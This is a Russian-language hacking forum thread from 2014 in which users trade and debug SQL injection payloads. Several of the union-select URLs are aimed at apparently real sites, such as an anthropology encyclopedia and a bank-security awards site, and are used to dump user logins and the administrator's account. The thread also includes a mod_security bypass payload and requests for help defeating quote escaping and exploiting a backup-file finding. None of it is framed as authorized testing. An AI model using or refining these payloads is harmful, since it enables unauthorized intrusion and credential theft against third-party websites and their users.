HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #23711  
Старый 11.08.2014, 11:55
Unknown
Guest
Сообщений: n/a
Провел на форуме:
12774

Репутация: 12
По умолчанию

начал раскручивать скулю.. и столкнулся с такой проблемой

нашел 3 интерисующих меня стобца:

usr_login

usr_name

usr_pass

При запросе:

Код:
Code:
http://encycl.anthropology.ru/article.php?id=-1+union+select+1,concat(usr_login,0x3a,usr_pass),3,4,5,6,7,8,9,10+from+user+--+
Ничего не выводит.

А при запросе:

Код:
Code:
http://encycl.anthropology.ru/article.php?id=-1+union+select+1,concat(usr_login,0x3a,usr_name),3,4,5,6,7,8,9,10+from+user+--+
Выводит имя и логин пользователей(включая админа).

Вопрос: Получается вывод паролей как-то защищен? Как вывести пароль?
 
Ответить с цитированием

  #23712  
Старый 11.08.2014, 12:28
MaxFast
Guest
Сообщений: n/a
Провел на форуме:
178623

Репутация: 94
По умолчанию

Цитата:
Сообщение от Shade  
Shade said:
начал раскручивать скулю.. и столкнулся с такой проблемой
нашел 3 интерисующих меня стобца:
usr_login
usr_name
usr_pass
При запросе:
Код:
Code:
http://encycl.anthropology.ru/article.php?id=-1+union+select+1,concat(usr_login,0x3a,usr_pass),3,4,5,6,7,8,9,10+from+user+--+
Ничего не выводит.
А при запросе:
Код:
Code:
http://encycl.anthropology.ru/article.php?id=-1+union+select+1,concat(usr_login,0x3a,usr_name),3,4,5,6,7,8,9,10+from+user+--+
Выводит имя и логин пользователей(включая админа).
Вопрос: Получается вывод паролей как-то защищен? Как вывести пароль?
Колонка usr_pass просто пуста.
 
Ответить с цитированием

  #23713  
Старый 11.08.2014, 22:05
ninja96c
Guest
Сообщений: n/a
Провел на форуме:
1593

Репутация: 1
По умолчанию

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]array_reverse[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"\x22"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mysql_real_escape_string[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\x22"[/COLOR][COLOR="#007700"])+[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]))));[/COLOR][/COLOR
и далее

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]UPDATE users SET data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'$data[1]'[/COLOR][/COLOR
Есть вариант пихнуть что-то такое, чтобы можно было обойти экранирование кавычек и провести SQL-инжект?
 
Ответить с цитированием

  #23714  
Старый 12.08.2014, 04:59
MaxFast
Guest
Сообщений: n/a
Провел на форуме:
178623

Репутация: 94
По умолчанию

Есть одна инъекция.

Код:
Code:
/-1'+union+select+1,2,3,4,user(),6,7,8,9,10+--+
Отлично выводит пользователя.

Код:
Code:
-1'+union+select+1,2,3,4,user,6,7,8,9,10+from+mysql.user+--+
Ответ - 404 Not Found

Тогда я подумал подставить валидное значение

Код:
Code:
-45742'+union+select+1,2,3,4,user,6,7,8,9,10+from+mysql.user+--+
Ответ - 404 Not Found

Все дальнейшие запросы кроме user(), database(), version() отвечают ошибкой 404.

Тогда я подумал что это WAF. И загрязнил запрос стандартными комментариями.

Ответ - 404 Not Found

Вообще любые запросы отвечают 404.

Что это может быть?
 
Ответить с цитированием

  #23715  
Старый 12.08.2014, 09:22
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию

Цитата:
Сообщение от MaxFast  
MaxFast said:
Есть одна инъекция.
Код:
Code:
/-1'+union+select+1,2,3,4,user(),6,7,8,9,10+--+
Отлично выводит пользователя.
Код:
Code:
-1'+union+select+1,2,3,4,user,6,7,8,9,10+from+mysql.user+--+
Ответ - 404 Not Found
Тогда я подумал подставить валидное значение
Код:
Code:
-45742'+union+select+1,2,3,4,user,6,7,8,9,10+from+mysql.user+--+
Ответ - 404 Not Found
Все дальнейшие запросы кроме user(), database(), version() отвечают ошибкой 404.
Тогда я подумал что это WAF. И загрязнил запрос стандартными комментариями.
Ответ - 404 Not Found
Вообще любые запросы отвечают 404.
Что это может быть?
Попробуй использовать подзапросы.
 
Ответить с цитированием

  #23716  
Старый 12.08.2014, 09:46
MaxFast
Guest
Сообщений: n/a
Провел на форуме:
178623

Репутация: 94
По умолчанию

Цитата:
Сообщение от kingbeef  
kingbeef said:
Попробуй использовать подзапросы.
Может быть, конечно, криво использовал select и подзапросы, но всё равно ответ был 404.

Код:
Code:
http://www.awards.ib-bank.ru/participant/-1'+union+select+1,2,3,4,5,6,7,8,9,10+--+
В общем вот инъекция сама. Тут вывод полей как видно.

Я первый раз сталкиваюсь с этим.

Конечно это может быть и WAF'ом, которому и комментарии нипочем (Всё-таки сайт посвящён ИБ банков).
 
Ответить с цитированием

  #23717  
Старый 12.08.2014, 10:57
Unknown
Guest
Сообщений: n/a
Провел на форуме:
12774

Репутация: 12
По умолчанию

Такой вопрос.. хотел посмотреть как работает сканер Jsky, ввел сайт, все норм.. вообщем он насканил file backup check, искал на форуме ну ничего не нашел((( хотел бы попросить ссылочку (если такова имеется) где было бы про эту уязвимость побольше информации и чтоб было написанно как её использовать..хотябы вкраце. Буду очень благодарен
 
Ответить с цитированием

  #23718  
Старый 12.08.2014, 11:22
MaxFast
Guest
Сообщений: n/a
Провел на форуме:
178623

Репутация: 94
По умолчанию

Цитата:
Сообщение от Shade  
Shade said:
Такой вопрос.. хотел посмотреть как работает сканер Jsky, ввел сайт, все норм.. вообщем он насканил
file backup check
, искал на форуме ну ничего не нашел((( хотел бы попросить ссылочку (если такова имеется) где было бы про эту уязвимость побольше информации и чтоб было написанно как её использовать..хотябы вкраце. Буду очень благодарен
Ничего примечательного. Возможно бэкап файла обыкновенный.
 
Ответить с цитированием

  #23719  
Старый 14.08.2014, 20:27
billybonse
Guest
Сообщений: n/a
Провел на форуме:
12164

Репутация: 1
По умолчанию

Мужики, такой вопрос.

Вроде бы обошел mod_security, в итоге такой запрос:

http://www.xxxxx.com/checkout.php?id=-39+/*!50000UNION*/+/*!50000SELECT*/+1,table_name,3,4,5,6,7,8,9,10,11+/*5000FROM*/+information_schema,tables+/*50000LIMIT*/+0,1--

Выдает ошибку "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0,1--' at line 1"

Что я неправильно сделал?
 
Ответить с цитированием

  #23720  
Старый 14.08.2014, 22:35
Unknown
Guest
Сообщений: n/a
Провел на форуме:
114076

Репутация: 54
По умолчанию

Цитата:
Сообщение от billybonse  
billybonse said:
Мужики, такой вопрос.
Вроде бы обошел mod_security, в итоге такой запрос:
http://www.xxxxx.com/checkout.php?id=-39+/*!50000UNION*/+/*!50000SELECT*/+1,table_name,3,4,5,6,7,8,9,10,11+/*5000FROM*/+information_schema,tables+/*50000LIMIT*/+0,1--
Выдает ошибку "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0,1--' at line 1"
Что я неправильно сделал?
http://www.xxxxx.com/checkout.php?id=-39+/*!50000UNION*/+/*!50000SELECT*/+1,table_name,3,4,5,6,7,8,9,10,11+/*5000FROM*/+information_schema,tables+/*50000LIMIT*/+0,1--

Запятая вместо точки.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ